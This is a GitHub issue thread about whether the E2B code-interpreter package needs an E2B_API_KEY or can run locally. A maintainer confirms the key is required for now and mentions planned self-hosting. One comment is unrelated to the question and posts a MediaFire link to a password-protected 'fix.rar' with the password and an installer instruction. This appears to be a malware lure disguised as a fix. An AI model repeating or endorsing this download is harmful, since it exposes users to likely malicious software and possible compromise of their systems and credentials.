### ISSUE TITLE
hi.e2b team. Is it necessary to set E2B_API_KEY?

### ISSUE THREAD

**Issue by ParseDark** [e2b-dev/code-interpreter#37]
When try to use this pkg it's always let me set the E2B_API_KEY. i want to run on my local. I want to double confirm is i have to use the E2B cloud server? I don't want to send my code to anywhere.

<img width="698" alt="image" src="https://github.com/user-attachments/assets/56ed8ecb-0457-4b8d-aa63-e9fb8b4570f8">

**Comment by We-NutCracker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by mlejva** [comment]
Hi @ParseDark, yes. At the moment you need to use E2B API Key. We're working on easy self-hosting of E2B on AWS & GCP cloud providers

**Comment by ParseDark** [comment]
Thanks for your reply. @mlejva  Well because I want to use it on a company project if can't self-deploy I have to find another solution.  I will keep waiting for the self-host solution. Thank E2B team And I will close this issue.

BR

**Comment by mlejva** [comment]
> Thanks for your reply. @mlejva Well because I want to use it on a company project if can't self-deploy I have to find another solution. I will keep waiting for the self-host solution. Thank E2B team And I will close this issue.
> 
> BR

@ParseDark can you share the company? We're working with a few design partners on the self-hosted solution
